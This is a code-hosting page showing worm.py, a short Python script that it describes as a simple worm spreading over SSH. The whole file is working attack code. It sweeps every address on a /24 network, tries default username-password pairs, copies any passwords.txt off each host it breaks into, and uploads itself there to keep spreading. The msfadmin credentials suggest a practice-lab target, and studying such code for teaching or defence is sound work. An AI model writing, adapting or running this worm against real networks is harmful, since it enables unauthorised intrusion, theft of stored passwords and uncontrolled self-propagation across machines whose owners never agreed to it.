-
Notifications
You must be signed in to change notification settings - Fork 0
/
worm.py
90 lines (73 loc) · 3.09 KB
/
worm.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/env python3
""" Implementation of simple worm that spreads via SSH connection.
"""
import logging
import paramiko
import scp
import sys
class Worm:
""" This class represents implementation of worm that spreads via SSH
connections.
"""
def __init__(self, network_address):
self._network = network_address
@property
def network(self):
""" Network, on which the worm spreads. """
return self._network
@network.setter
def network(self, new_network):
self._network = new_network
@property
def credentials(self):
""" Possible SSH credentials of the victim. """
return (
('user', 'user'),
('root', 'root'),
('msfadmin', 'msfadmin')
)
def generate_addresses_on_network(self):
""" Generate addresses of hosts on the given network.
For simplicity is expected the following mask:
255.255.255.0
"""
network = self.network.split('.')
for host in range(1, 256):
network[-1] = str(host)
yield '.'.join(network)
def spread_via_ssh(self):
""" Spread the worm on the network via SSH connections.
To establish SSH connection try selected user-password
combinations. When the connection is established, copy
the worm to the remote host.
"""
# Setup SSH client.
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for remote_address in self.generate_addresses_on_network():
logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
for user, passw in self.credentials:
try:
ssh.connect(remote_address, port=22, username=user, password=passw, timeout=10)
logging.debug('The worm is succesfully connected to the remote host [{}, {}].'.format(user, passw))
# Create SCP client for file transmission.
scp_client = scp.SCPClient(ssh.get_transport())
# Obtain file with victim's passwords.
try:
scp_client.get('passwords.txt')
logging.debug('The victim had passwords.txt')
except Exception:
logging.debug('The victim did not have passwords.txt')
# Upload worm to the remote host.
scp_client.put(sys.argv[0])
print()
except Exception:
logging.debug('The remote host refused connection with credentials {},{}.'.format(user, passw))
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
# Disable basic logging of paramiko to make log easier to read.
logging.getLogger('paramiko').setLevel(logging.CRITICAL)
# Initialize worm with the network address.
worm = Worm('198.168.100.0')
# Spread via SSH connection on the network.
worm.spread_via_ssh()